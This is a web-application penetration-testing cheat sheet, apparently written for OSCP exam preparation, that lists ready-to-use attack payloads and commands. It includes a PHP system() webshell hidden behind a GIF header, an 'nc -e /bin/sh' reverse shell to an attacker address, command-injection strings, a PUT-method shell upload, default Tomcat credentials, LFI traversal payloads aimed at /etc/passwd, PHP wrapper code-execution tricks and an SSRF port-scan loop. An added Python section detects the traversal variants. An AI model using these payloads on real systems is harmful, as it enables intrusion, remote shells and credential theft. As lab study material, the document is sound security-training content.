OSCP
Web Application
Checking HTTP Methods
curl -i -X OPTIONS http://XXXX
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Curl usage
curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"
Shell via Put Method
Put Shell
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"
RFI
fimap -u "http://$ip/example.php?test="
https://github.com/lightos/Panoptic/
JBOSS
JMX Console: http://$ip:8080/jmx-console/
Tomcat Manager Default Credentials
Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (empty password).
Command Injection
Command injection
`id`
| id
&& id
error || id
%0a id
File upload bypass
content-type:image/gif
GIF89a <?php echo system($_REQUEST['ippsec']); ?>
?ippsec=nc -e /bin/sh ip port
SQL Shell
mysql -u root -p
\! /bin/sh
LFI
Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500

Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500

Wordlists
/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt
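As an added defensive example (not part of the original cheat sheet): a small Python log check that URL-decodes request paths repeatedly and flags the traversal, null-byte and double-encoded (%2500) variants listed above. The request lines and the page parameter name are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines: the traversal variants from the list above
# (plain, %2f-encoded, %00 null byte, %2500 double-encoded) plus two benign ones.
SAMPLE_LOG = """\
GET /index.php?page=home HTTP/1.1
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
GET /index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
GET /index.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /index.php?page=..%2f..%2f..%2f..%2f..%2fboot.ini%2500 HTTP/1.1
GET /index.php?page=about..page HTTP/1.1
"""

# Dot-dot followed by a forward or back slash, checked after full decoding.
TRAVERSAL = re.compile(r"\.\.[\\/]")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable, so %2500 -> %00 -> NUL is caught like the plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(path: str) -> list[str]:
    """Return the suspicious properties of one request path (empty list if clean)."""
    decoded = fully_decode(path)
    findings = []
    if TRAVERSAL.search(decoded):
        findings.append("traversal")
    if "\x00" in decoded:
        findings.append("null-byte")
    if decoded != unquote(path):  # a second decode round changed something
        findings.append("double-encoded")
    return findings


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Run classify() over each 'METHOD PATH PROTO' line, keeping only the hits."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        findings = classify(parts[1])
        if findings:
            hits.append((parts[1], findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(f"{', '.join(findings):28s} {path}")
```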
LFI Wrappers
LFI Wrappers
expect://
http://x.x.x.x/blah?parameter=expect://whoami
data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
php://input
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
LFI to RCE
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data
SSRF
for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d "\n"; done